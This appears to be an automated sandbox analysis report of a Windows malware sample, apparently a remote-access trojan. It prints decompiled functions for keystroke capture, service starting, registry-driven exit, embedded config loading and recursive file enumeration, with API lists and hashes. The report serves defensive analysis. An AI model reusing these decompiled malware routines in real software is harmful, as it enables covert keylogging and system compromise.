                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004089F0, Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E004089F0(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E00432D80(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E00404260(_t30, _a4,  &_v40);
				return _a4;
			}













                                                                                                0x00408a07
                                                                                                0x00408a0c
                                                                                                0x00408a19
                                                                                                0x00408a1f
                                                                                                0x00408a20
                                                                                                0x00408a22
                                                                                                0x00408a36
                                                                                                0x00408a40
                                                                                                0x00408a4d
                                                                                                0x00408a69
                                                                                                0x00408a76
                                                                                                0x00408a84

                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00408A24
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00408A2F
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00408A36
                                                                                                • GetKeyState.USER32(00000010), ref: 00408A40
                                                                                                • GetKeyboardState.USER32(?), ref: 00408A4D
                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                • String ID:
                                                                                                • API String ID: 3566172867-0
                                                                                                • Opcode ID: 68725428f3adce387c2005b2b6eac9a3a573156eb01c1af9bc8d7a97e283f8bf
                                                                                                • Instruction ID: 954dbeb75a3367939cd3f671746bd10b6718b1437367162c7db61e97fd0e5538
                                                                                                • Opcode Fuzzy Hash: 68725428f3adce387c2005b2b6eac9a3a573156eb01c1af9bc8d7a97e283f8bf
                                                                                                • Instruction Fuzzy Hash: 8C115272A0020CBBDB10DBE0ED49FDA77BCEB4C755F000465FA04EA1A1E6B5E9549BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416D71, Relevance: 9.0, APIs: 6, Instructions: 42serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00416D71(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, E00401EDD( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00401EE2();
				return _t14;
			}






                                                                                                0x00416d79
                                                                                                0x00416d88
                                                                                                0x00416d97
                                                                                                0x00416d9b
                                                                                                0x00416db8
                                                                                                0x00416dbb
                                                                                                0x00416dbe
                                                                                                0x00416d9d
                                                                                                0x00416d9e
                                                                                                0x00416d9e
                                                                                                0x00416dc3
                                                                                                0x00416dce

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,004169F7,00000000), ref: 00416D7D
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,004169F7,00000000), ref: 00416D91
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416D9E
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,004169F7,00000000), ref: 00416DA9
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416DBB
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416DBE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: ef07e6c86237960c802dac9a5680cb0117c874ae721aa68fb8168dbb6c57e619
                                                                                                • Instruction ID: b3f61633ed7c41ea8795e5440c840da447dc60db2636738ac19c69509a0bb623
                                                                                                • Opcode Fuzzy Hash: ef07e6c86237960c802dac9a5680cb0117c874ae721aa68fb8168dbb6c57e619
                                                                                                • Instruction Fuzzy Hash: 9BF0B43210122C7FD2106F65EC88DBF3B6CDBC1BA9B11002AFA0996191CA78CDC5A5F8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040D0FF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E0040D0FF() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = E00401F87(0x46e5a8);
					E004108B4(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E004074B3(0x46e590, _t63 - 0x18, _t52, __eflags, 0x46e590);
						_push(L"pth_unenc");
						E00410B7B(0x80000001, E00401EDD(E00417CCA( &_v32, 0x46e5a8)));
						E00401EE2();
						_push(1);
						E00402076(0x46e590, _t67 + 0x20 - 0x18, "3.3.2 Pro");
						_push("v");
						E00410AD6(0x46e5a8, E00401F87(0x46e5a8));
						E00410199();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8);
						continue;
					}
					E0040ADA8();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E004074B3(0x46e590, _t64, _t52, _t74, 0x46e590);
					_push(L"pth_unenc");
					E00410B7B(0x80000001, E00401EDD(E00417CCA( &_v32, 0x46e5a8)));
					E00401EE2();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402076(0x46e590, _t66, "3.3.2 Pro");
					_push("v");
					E00410AD6(0x46e5a8, E00401F87(0x46e5a8));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}










                                                                                                0x0040d105
                                                                                                0x0040d114
                                                                                                0x0040d114
                                                                                                0x0040d12a
                                                                                                0x0040d12c
                                                                                                0x0040d137
                                                                                                0x0040d13a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040d13c
                                                                                                0x0040d13f
                                                                                                0x0040d1be
                                                                                                0x0040d1c0
                                                                                                0x0040d1c6
                                                                                                0x0040d1cb
                                                                                                0x0040d1e9
                                                                                                0x0040d1f5
                                                                                                0x0040d1fa
                                                                                                0x0040d206
                                                                                                0x0040d20b
                                                                                                0x0040d219
                                                                                                0x0040d221
                                                                                                0x0040d228
                                                                                                0x0040d228
                                                                                                0x0040d141
                                                                                                0x0040d144
                                                                                                0x0040d1ae
                                                                                                0x0040d1b3
                                                                                                0x00000000
                                                                                                0x0040d1b3
                                                                                                0x0040d146
                                                                                                0x0040d14b
                                                                                                0x0040d14b
                                                                                                0x0040d14d
                                                                                                0x0040d153
                                                                                                0x0040d158
                                                                                                0x0040d176
                                                                                                0x0040d182
                                                                                                0x0040d187
                                                                                                0x0040d189
                                                                                                0x0040d193
                                                                                                0x0040d198
                                                                                                0x0040d1a6
                                                                                                0x0040d1ab
                                                                                                0x00000000
                                                                                                0x0040d1ab

                                                                                                APIs
                                                                                                  • Part of subcall function 004108B4: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108D4
                                                                                                  • Part of subcall function 004108B4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004108F2
                                                                                                  • Part of subcall function 004108B4: RegCloseKey.ADVAPI32(?), ref: 004108FD
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040D1B3
                                                                                                • ExitProcess.KERNEL32 ref: 0040D228
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 3.3.2 Pro$override$pth_unenc
                                                                                                • API String ID: 2281282204-3274502919
                                                                                                • Opcode ID: 895b86eccd8d28ed9292c6040119295059f38bf5f6a2924e23802ee28b4e815b
                                                                                                • Instruction ID: ab9f1b4df45feb8c48745f3e59a62def2f7dbb76d07eca292e9077384f3f1501
                                                                                                • Opcode Fuzzy Hash: 895b86eccd8d28ed9292c6040119295059f38bf5f6a2924e23802ee28b4e815b
                                                                                                • Instruction Fuzzy Hash: DA21E571F043012BD60476B68C57BAE35999F95708F24442FB801AB2D6FEBD8A4083DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B90C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E0044B90C(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x45b018;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x45b020;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E004374BA(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                                                                                0x0044b911
                                                                                                0x0044b912
                                                                                                0x0044b919
                                                                                                0x0044b9bd
                                                                                                0x0044b9cb
                                                                                                0x0044b9d6
                                                                                                0x0044b9dc
                                                                                                0x0044b9e1
                                                                                                0x0044b9e3
                                                                                                0x0044b9e3
                                                                                                0x0044b9e9
                                                                                                0x0044b9ee
                                                                                                0x0044b9ee
                                                                                                0x0044b9d8
                                                                                                0x0044b9d8
                                                                                                0x00000000
                                                                                                0x0044b9d8
                                                                                                0x0044b91f
                                                                                                0x0044b924
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b92a
                                                                                                0x0044b92f
                                                                                                0x0044b931
                                                                                                0x0044b931
                                                                                                0x0044b937
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b93c
                                                                                                0x0044b953
                                                                                                0x0044b953
                                                                                                0x0044b95c
                                                                                                0x0044b95e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b960
                                                                                                0x0044b965
                                                                                                0x0044b967
                                                                                                0x0044b967
                                                                                                0x0044b96d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b972
                                                                                                0x0044b990
                                                                                                0x0044b992
                                                                                                0x0044b9b5
                                                                                                0x00000000
                                                                                                0x0044b9ba
                                                                                                0x0044b9a2
                                                                                                0x0044b9ad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b9af
                                                                                                0x00000000
                                                                                                0x0044b9af
                                                                                                0x0044b974
                                                                                                0x0044b97c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b97e
                                                                                                0x0044b981
                                                                                                0x0044b987
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b989
                                                                                                0x0044b98b
                                                                                                0x0044b98d
                                                                                                0x00000000
                                                                                                0x0044b98d
                                                                                                0x0044b93e
                                                                                                0x0044b946
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b948
                                                                                                0x0044b94b
                                                                                                0x0044b951
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b951
                                                                                                0x0044b957
                                                                                                0x0044b959
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044BC2B,?,00000000), ref: 0044B9A5
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044BC2B,?,00000000), ref: 0044B9CE
                                                                                                • GetACP.KERNEL32(?,?,0044BC2B,?,00000000), ref: 0044B9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: f045e2f8a20af44426dc1fe4fe8b9a83c8f0a3672ebcd683f0f2934e8eb2e5c4
                                                                                                • Instruction ID: 28a97a8de93285a340377b001af7d0fb9ba955f2816ec725b2bfbfcb5361b626
                                                                                                • Opcode Fuzzy Hash: f045e2f8a20af44426dc1fe4fe8b9a83c8f0a3672ebcd683f0f2934e8eb2e5c4
                                                                                                • Instruction Fuzzy Hash: B12106A2600204A6FB348F15C801BABB7A6EF54B54B568026EB49CB300E73ADE41C3D8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00417629, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00417629(void** __ecx) {
				struct HRSRC__* _t1;
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t1 = FindResourceA( *0x46dd1c, "SETTINGS", 0xa);
				_t7 = _t1;
				if(_t7 != 0) {
					_t3 = LockResource(LoadResource( *0x46dd1c, _t7));
					_t4 = SizeofResource( *0x46dd1c, _t7);
					 *_t5 = _t3;
					return _t4;
				}
				return _t1;
			}








                                                                                                0x00417638
                                                                                                0x0041763a
                                                                                                0x00417640
                                                                                                0x00417644
                                                                                                0x00417655
                                                                                                0x00417664
                                                                                                0x0041766a
                                                                                                0x00000000
                                                                                                0x0041766c
                                                                                                0x0041766f

                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 0041763A
                                                                                                • LoadResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 0041764E
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 00417655
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,?,0040CCBA), ref: 00417664
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: eeef2a018f1032e0c24a2081691b2ffd6b8c60c71593df6125c51553ed440201
                                                                                                • Instruction ID: 91499a21751a176828ba935c1427f838fa71bbaa7d48000b3f13d84a7695817a
                                                                                                • Opcode Fuzzy Hash: eeef2a018f1032e0c24a2081691b2ffd6b8c60c71593df6125c51553ed440201
                                                                                                • Instruction Fuzzy Hash: 45E01A76A00710ABCB212BA9AC4CD87BF39E7D9B573210036F91186321EA7588919A29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00407C95, Relevance: 7.7, APIs: 5, Instructions: 246fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E00407C95(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t146;
				signed int _t147;
				intOrPtr _t150;
				char* _t171;
				char* _t172;
				char* _t211;
				void* _t215;
				void* _t219;
				void* _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t226 = __eflags;
				_t150 = __ecx;
				E00452248(E004537CC, _t219);
				_t222 = _t221 - 0x308;
				_push(_t146);
				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
				E004020C7(_t146, _t219 - 0x5c);
				_t81 = E004022FC(_t219 + 0x20, _t219 - 0x1c);
				_t83 = E004022BF(_t219 + 0x20, _t219 - 0x20);
				E00408269(_t219 - 0x28,  *((intOrPtr*)(E004022FC(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
				_t223 = _t222 + 0xc;
				_t204 = _t219 + 8;
				_t215 = FindFirstFileW(E00401EDD(E00407677(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
				 *(_t219 - 0x1c) = _t215;
				E00401EE2();
				if(_t215 != 0xffffffff) {
					_t147 = 0;
					__eflags = 0;
					while(1) {
						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
						__eflags = _t93;
						if(_t93 == 0) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t219 - 0x18));
						__eflags =  *_t211;
						if( *_t211 == 0) {
							__eflags =  *(_t219 - 0x30c) & 0x00000010;
							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
								L25:
								E00404260(_t147, _t219 - 0x40, _t219 - 0x2e0);
								_t102 = E004022FC(_t219 - 0x40, _t219 - 0x28);
								_t217 = E004022BF(_t219 - 0x40, _t219 - 0x24);
								E00408269(_t219 - 0x44,  *((intOrPtr*)(E004022FC(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
								_t223 = _t223 + 0xc;
								__eflags = E004080DA(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
								if(__eflags == 0) {
									L29:
									E00401EE2();
									_t215 =  *(_t219 - 0x1c);
									continue;
								}
								E00401FC3(_t219 - 0x5c, _t204, _t217, E0040209D(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
								E00401FB9();
								 *(_t219 - 4) = _t147;
								_t223 = _t223 - 0x18;
								_t204 = E00402F85(_t147, _t219 - 0x74, E00417D8C(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x46e250);
								E00402F85(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
								_push(0x66);
								__eflags = E00404BB7(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
								E00401FB9();
								E00401FB9();
								if((_t147 & 0xffffff00 | E00404BB7(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
									_t147 = 0;
									__eflags = 0;
									goto L29;
								}
								E00401EE2();
								E00401FB9();
								E00401EE2();
								E00401EE2();
								_t98 = 0;
								L31:
								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
								return _t98;
							}
							_t171 = ".";
							_t126 = _t219 - 0x2e0;
							while(1) {
								_t204 =  *_t126;
								__eflags = _t204 -  *_t171;
								if(_t204 !=  *_t171) {
									break;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									L13:
									_t127 = _t147;
									L15:
									__eflags = _t127;
									if(_t127 == 0) {
										goto L25;
									}
									_t172 = L"..";
									_t128 = _t219 - 0x2e0;
									while(1) {
										_t204 =  *_t128;
										__eflags = _t204 -  *_t172;
										if(_t204 !=  *_t172) {
											break;
										}
										__eflags = _t204;
										if(_t204 == 0) {
											L21:
											_t129 = _t147;
											L23:
											__eflags = _t129;
											if(__eflags != 0) {
												_push(_t172);
												_t204 = E00408293(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E00404260(_t147, _t219 - 0x74, _t219 - 0x2e0));
												E004082B7(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
												E00401EE2();
												E00401EE2();
												_t225 = _t223 - 0x18;
												E004074B3(_t147, _t225, _t132, __eflags, _t219 + 0x20);
												_t223 = _t225 - 0x18;
												E004074B3(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
												E00407C95(_t211, _t204, __eflags);
												E00401EE2();
											}
											goto L25;
										}
										_t204 =  *((intOrPtr*)(_t128 + 2));
										_t29 =  &(_t172[2]); // 0x2e
										__eflags = _t204 -  *_t29;
										if(_t204 !=  *_t29) {
											break;
										}
										_t128 = _t128 + 4;
										_t172 =  &(_t172[4]);
										__eflags = _t204;
										if(_t204 != 0) {
											continue;
										}
										goto L21;
									}
									asm("sbb eax, eax");
									_t129 = _t128 | 0x00000001;
									__eflags = _t129;
									goto L23;
								}
								_t204 =  *((intOrPtr*)(_t126 + 2));
								_t26 =  &(_t171[2]); // 0x2e0000
								__eflags = _t204 -  *_t26;
								if(_t204 !=  *_t26) {
									break;
								}
								_t126 = _t126 + 4;
								_t171 =  &(_t171[4]);
								__eflags = _t204;
								if(_t204 != 0) {
									continue;
								}
								goto L13;
							}
							asm("sbb eax, eax");
							_t127 = _t126 | 0x00000001;
							__eflags = _t127;
							goto L15;
						}
						FindClose(_t215);
						L6:
						E00401FB9();
						E00401EE2();
						E00401EE2();
						_t98 = _t147;
						goto L31;
					}
					FindClose(_t215);
					E00401FB9();
					E00401EE2();
					E00401EE2();
					_t98 = 1;
					goto L31;
				}
				_t147 = 1;
				goto L6;
			}




























                                                                                                0x00407c95
                                                                                                0x00407c95
                                                                                                0x00407c9a
                                                                                                0x00407c9f
                                                                                                0x00407ca5
                                                                                                0x00407ca8
                                                                                                0x00407cab
                                                                                                0x00407cb1
                                                                                                0x00407cbd
                                                                                                0x00407ccb
                                                                                                0x00407ce7
                                                                                                0x00407cec
                                                                                                0x00407cfb
                                                                                                0x00407d18
                                                                                                0x00407d1a
                                                                                                0x00407d23
                                                                                                0x00407d2b
                                                                                                0x00407d31
                                                                                                0x00407d31
                                                                                                0x00407d33
                                                                                                0x00407d3b
                                                                                                0x00407d41
                                                                                                0x00407d43
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407d49
                                                                                                0x00407d4c
                                                                                                0x00407d4f
                                                                                                0x00407d77
                                                                                                0x00407d7e
                                                                                                0x00407e6e
                                                                                                0x00407e78
                                                                                                0x00407e84
                                                                                                0x00407e97
                                                                                                0x00407eae
                                                                                                0x00407eb3
                                                                                                0x00407ec3
                                                                                                0x00407ec6
                                                                                                0x00407f7f
                                                                                                0x00407f82
                                                                                                0x00407f87
                                                                                                0x00000000
                                                                                                0x00407f87
                                                                                                0x00407ee4
                                                                                                0x00407eec
                                                                                                0x00407ef1
                                                                                                0x00407ef4
                                                                                                0x00407f1b
                                                                                                0x00407f1f
                                                                                                0x00407f25
                                                                                                0x00407f32
                                                                                                0x00407f3b
                                                                                                0x00407f46
                                                                                                0x00407f4d
                                                                                                0x00407f79
                                                                                                0x00407f7d
                                                                                                0x00407f7d
                                                                                                0x00000000
                                                                                                0x00407f7d
                                                                                                0x00407f52
                                                                                                0x00407f5a
                                                                                                0x00407f62
                                                                                                0x00407f6a
                                                                                                0x00407f6f
                                                                                                0x00407fb0
                                                                                                0x00407fb3
                                                                                                0x00407fc0
                                                                                                0x00407fc0
                                                                                                0x00407d84
                                                                                                0x00407d89
                                                                                                0x00407d8f
                                                                                                0x00407d8f
                                                                                                0x00407d92
                                                                                                0x00407d95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407d97
                                                                                                0x00407d9a
                                                                                                0x00407db1
                                                                                                0x00407db1
                                                                                                0x00407dba
                                                                                                0x00407dba
                                                                                                0x00407dbc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407dc2
                                                                                                0x00407dc7
                                                                                                0x00407dcd
                                                                                                0x00407dcd
                                                                                                0x00407dd0
                                                                                                0x00407dd3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407dd5
                                                                                                0x00407dd8
                                                                                                0x00407def
                                                                                                0x00407def
                                                                                                0x00407df8
                                                                                                0x00407df8
                                                                                                0x00407dfa
                                                                                                0x00407dfc
                                                                                                0x00407e1c
                                                                                                0x00407e24
                                                                                                0x00407e30
                                                                                                0x00407e38
                                                                                                0x00407e3d
                                                                                                0x00407e46
                                                                                                0x00407e4b
                                                                                                0x00407e57
                                                                                                0x00407e5e
                                                                                                0x00407e69
                                                                                                0x00407e69
                                                                                                0x00000000
                                                                                                0x00407dfa
                                                                                                0x00407dda
                                                                                                0x00407dde
                                                                                                0x00407dde
                                                                                                0x00407de2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407de4
                                                                                                0x00407de7
                                                                                                0x00407dea
                                                                                                0x00407ded
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407ded
                                                                                                0x00407df3
                                                                                                0x00407df5
                                                                                                0x00407df5
                                                                                                0x00000000
                                                                                                0x00407df5
                                                                                                0x00407d9c
                                                                                                0x00407da0
                                                                                                0x00407da0
                                                                                                0x00407da4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407da6
                                                                                                0x00407da9
                                                                                                0x00407dac
                                                                                                0x00407daf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00407daf
                                                                                                0x00407db5
                                                                                                0x00407db7
                                                                                                0x00407db7
                                                                                                0x00000000
                                                                                                0x00407db7
                                                                                                0x00407d52
                                                                                                0x00407d58
                                                                                                0x00407d5b
                                                                                                0x00407d63
                                                                                                0x00407d6b
                                                                                                0x00407d70
                                                                                                0x00000000
                                                                                                0x00407d70
                                                                                                0x00407f90
